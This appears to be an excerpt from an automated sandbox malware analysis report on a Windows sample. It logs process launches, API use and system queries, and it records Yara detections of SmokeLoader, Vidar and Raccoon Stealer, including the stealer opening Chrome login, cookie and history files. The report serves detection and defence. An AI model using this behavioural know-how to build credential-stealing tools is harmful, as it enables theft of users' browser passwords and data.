Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /SpecialRun 4101d8 4288
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process created: unknown unknown
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 32_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 29_2_6A94E730
Source: explorer.exe, 00000007.00000000.292972549.0000000001400000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000007.00000000.267477940.0000000005F40000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.292972549.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.292972549.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.280135901.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000007.00000000.270521490.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\5D4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Users\user\AppData\Local\Temp\EDD.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\319A.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_00421940 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00421940
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 29_2_6A944020

Stealing of Sensitive Information:

barindex
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 26.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.97A5.exe.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.cviueca.2c715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.3180e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.cviueca.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SkB6zJ6H3N.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.192F.exe.3190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.450724070.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368853755.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404074560.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.294055792.0000000003111000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368895221.00000000004E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.308080762.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419226513.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.449678502.0000000002C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.402440778.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404878363.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.307863142.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419361924.00000000031B1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Yara detected Credential Stealer
Source: Yara match File source: 36.3.32BC.exe.2d741e6.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 26.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.97A5.exe.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.cviueca.2c715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.3180e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.192F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.97A5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.cviueca.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.cviueca.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SkB6zJ6H3N.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.SkB6zJ6H3N.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.1.cviueca.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.192F.exe.3190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.450724070.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368853755.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404074560.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.294055792.0000000003111000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.368895221.00000000004E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.308080762.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419226513.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.449678502.0000000002C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.402440778.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.404878363.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.307863142.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.419361924.00000000031B1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs